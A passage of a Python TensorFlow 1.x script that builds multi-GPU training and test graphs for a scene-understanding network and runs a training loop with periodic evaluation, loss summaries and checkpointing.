    data, label = net.cook_raw_inputs(reader)
    # NOTE(review): net(False, True) presumably selects training mode — confirm
    # against the models.NETWORK constructors.
    net_instance = net(False, True)
    with tf.name_scope('multiple_gpus'):
        # Split each input tensor along the batch axis, one shard per GPU.
        gpu_num = args.input_gpu_nums
        gpu_depth = tf.split(data[0], gpu_num, axis=0)
        gpu_normal = tf.split(data[1], gpu_num, axis=0)
        gpu_scene_info = tf.split(data[2], gpu_num, axis=0)
        gpu_label = tf.split(label, gpu_num, axis=0)
        gpu_data = [item for item in zip(gpu_depth, gpu_normal, gpu_scene_info)]
    tower_grads = []
    tower_losses = []
    with tf.variable_scope(tf.get_variable_scope()):
        gpu_id = 0
        for data, label in zip(gpu_data, gpu_label):
            with tf.device('/gpu:%s' % gpu_id):
                with tf.name_scope('tower_%s' % gpu_id) as _:
                    logit = net_instance.instance(data)
                    train_loss = loss(logit, label, data[0], data[2], scope='loss')
                    # Share variables across towers after the first one builds them.
                    tf.get_variable_scope().reuse_variables()
                    tower_grads.append(opt.compute_gradients(train_loss))
                    tower_losses.append(train_loss)
            gpu_id += 1
    # Run update ops (e.g. batch-norm moving stats) before applying gradients.
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
        grads = average_gradient(tower_grads)
        train_loss = average_losses(tower_losses)
        apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
        train_op = tf.group(apply_gradient_op)
    # Summaries: learning rate plus the externally averaged training loss.
    summary_lr_scheme = tf.summary.scalar('learning_rate', lr_scheme)
    average_train_loss = tf.placeholder(tf.float32, name='average_train_loss')
    summary_train_loss = tf.summary.scalar('train_ce', average_train_loss)
    train_merged = tf.summary.merge([summary_train_loss, summary_lr_scheme])
    return train_merged, average_train_loss, train_loss, train_op
def test_phase_network(net, args):
    """Build the evaluation graph for *net*.

    Returns (test summary op, avg-test-loss placeholder, loss tensor,
    number of iterations needed to cover the test set once).
    """
    logging.info('=====test network definition=====')
    # data: every *.tfrecord under the validation dir whose name contains 'test'
    validation_data_dir = args.input_validation_data_path
    data_records = [item for item in os.listdir(validation_data_dir) if item.endswith('.tfrecord')]
    test_records = [os.path.join(validation_data_dir, item) for item in data_records if item.find('test') != -1]
    # Fix: this log line previously said 'training resource' (copy-paste error).
    logging.info('available test resource: %s', test_records)
    batch_size = args.batch_per_device
    # Count records to derive how many batches cover the test set once.
    # NOTE(review): only the first record file is counted — confirm whether
    # multiple test files are ever expected here.
    num_samples = sum(1 for _ in tf.python_io.tf_record_iterator(test_records[0]))
    test_iters = int(num_samples / batch_size) + 1
    reader = dataset.SceneReader(test_records, shuffle=False, batch_size=batch_size, num_threads=10)
    logging.info('batch size for reader: %s', batch_size)
    net_instance = net(True, False)
    data, label = net.cook_raw_inputs(reader)
    logit = net_instance.instance(data)
    test_loss = loss(logit, label, data[0], data[2], scope='test_loss')
    # Summary for the externally averaged test loss.
    mean_test_loss = tf.placeholder(tf.float32, name='average_test_loss')
    summary_test_loss = tf.summary.scalar('test_ce', mean_test_loss)
    test_merged = tf.summary.merge([summary_test_loss])
    return test_merged, mean_test_loss, test_loss, test_iters
def train_network(args):
    """Train the selected network, periodically evaluating and checkpointing.

    Resumes from the latest checkpoint in args.output_model_path when present.
    """
    # network choice
    net = models.NETWORK[args.input_network]
    ckpt = tf.train.latest_checkpoint(args.output_model_path)
    # Recover the starting iteration from the checkpoint filename
    # (pattern 'model_iterNNNNNN.ckpt').
    start_iters = 0 if not ckpt else int(ckpt[ckpt.find('iter') + 4:-5])
    # train & test targets
    train_summary, average_train_loss, train_loss, train_op = train_phase_network(net, args)
    test_summary, average_test_loss, test_loss, test_iters = test_phase_network(net, args)
    # saver
    tf_saver = tf.train.Saver(max_to_keep=600)
    config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
    logging.info('=====start training=====')
    with tf.Session(config=config) as sess:
        # tf summary
        train_writer = tf.summary.FileWriter(os.path.join(args.log_dir, 'train'), sess.graph)
        # initialize, then restore checkpoint weights on top if resuming
        init = tf.global_variables_initializer()
        sess.run(init)
        if ckpt:
            tf_saver.restore(sess, ckpt)
        # Start the input-pipeline queue runners.
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(coord=coord)
        # start training
        avg_train_loss = 0.
        for i in range(start_iters, args.max_iters):
            # Periodic evaluation over the whole test set.
            if (i + 1) % args.record_iters == 0:
                avg_loss = 0.
                for test_iter in range(test_iters):
                    iter_test_loss = sess.run(test_loss)
                    avg_loss += iter_test_loss
                avg_loss /= test_iters
                summary = sess.run(test_summary, feed_dict={average_test_loss: avg_loss})
                train_writer.add_summary(summary, i)
                logging.info('test iters %d: %f', i, avg_loss)
            # Log the train loss averaged over the last 100 iterations.
            if (i + 1) % 100 == 0 and i != start_iters:
                avg_train_loss /= 100
                summary = sess.run(train_summary, feed_dict={average_train_loss: avg_train_loss})
                train_writer.add_summary(summary, i)
                logging.info('train iters %d: %f', i, avg_train_loss)
                avg_train_loss = 0
            # Periodic checkpointing (same cadence as evaluation).
            if (i + 1) % args.record_iters == 0:
                tf_saver.save(sess, os.path.join(args.output_model_path, 'model_iter%06d.ckpt' % i))
            iter_train_loss, _ = sess.run([train_loss, train_op])
            avg_train_loss += iter_train_loss
        # finished training: stop and join the queue-runner threads
        coord.request_stop()
        coord.join(threads)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.